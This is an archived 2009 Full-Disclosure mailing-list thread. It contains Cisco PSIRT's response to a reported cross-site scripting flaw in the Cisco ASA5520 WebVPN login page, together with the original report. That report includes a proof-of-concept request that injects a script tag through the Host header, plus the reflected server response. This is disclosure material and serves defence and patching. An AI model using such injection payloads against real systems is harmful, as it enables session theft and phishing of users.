lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <98AE08B66FAD1742BED6CB9522B7312206EE13C9@xmb-rtp-20d.amer.cisco.com>
Date: Fri, 24 Apr 2009 11:08:42 -0400
From: "Mark-David McLaughlin (marmclau)" <marmclau@...co.com>
To: "fd" <full-disclosure@...ts.grok.org.uk>
Subject: Re: Cisco ASA5520 Web VPN Host Header XSS

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is the Cisco PSIRT response to an issue discovered and reported to
Cisco by Bugs NotHugs regarding a cross-site scripting vulnerability in
the
Cisco Adaptive Security Appliance (ASA) clientless SSL VPN feature.
Cisco
PSIRT greatly appreciates the opportunity to work with researchers on
security vulnerabilities, and welcomes the opportunity to review and
assist
in product reports. PSIRT would like to thank Bugs NotHugs for reporting
this issue to us. 

Cisco has release an IntelliShield Alert on this vulnerability, which is
available at:
http://tools.cisco.com/security/center/viewAlert.x?alertId=17950.  This
and
other IntelliShield Alerts are available off the Cisco Security Center
(www.cisco.com/security). 

Cisco is currently patching this vulnerability as Cisco bug ID
CSCsy82093
and the fixes will be available in 8.0.3.31, 8.1.2.22, and 8.2.0. These
images will soon be available for download at either
http://www.cisco.com/cgi-bin/tablebuild.pl/asa or
http://www.cisco.com/cgi-bin/tablebuild.pl/asa-interim. 

To check on the latest versions with fixed releases please consult the
Cisco Bug Toolkit
http://tools.cisco.com/Support/BugToolKit/action.do?hdnAction=searchBugs
.

- -----Original Message-----
From: Bugs NotHugs [mailto:bugsnothugs@...il.com] 
Sent: Tuesday, March 31, 2009 6:18 AM
To: bugtraq; fd
Subject: Cisco ASA5520 Web VPN Host Header XSS

- - Cisco ASA5520 Web VPN Host Header XSS

- - Description

Cross-site scripting.

- - Product

Cisco, ASA5520, IOS 7.2(2)22

- - PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR
1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=


Response:

HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556

<html>
<!--
  Copyright (c) 2004, 2005 by Cisco Systems, Inc.
  All rights reserved.
 -->
<head>


<META http-equiv="PICS-Label" content='(PICS-1.1
"http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North
America Server" for
"http://"'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org/+webvpn+/index.html" on
"2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>

<meta http-equiv="Window-target" content="_top">
<title>WebVPN Service</title>


- - Solution

None

- - Timeline

2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)

- -- 

BugsNotHugs
Shared Vulnerability Disclosure Account

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.9.0 (Build 397)
Charset: utf-8

wj8DBQFJ8dXP86n/Gc8U/uARAsAjAJwNOVQlrSq4+LtHjUh3ziZI24ikzgCfeccr
A139kRwCBvDNYK4EX0Wr30w=
=r3sK
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ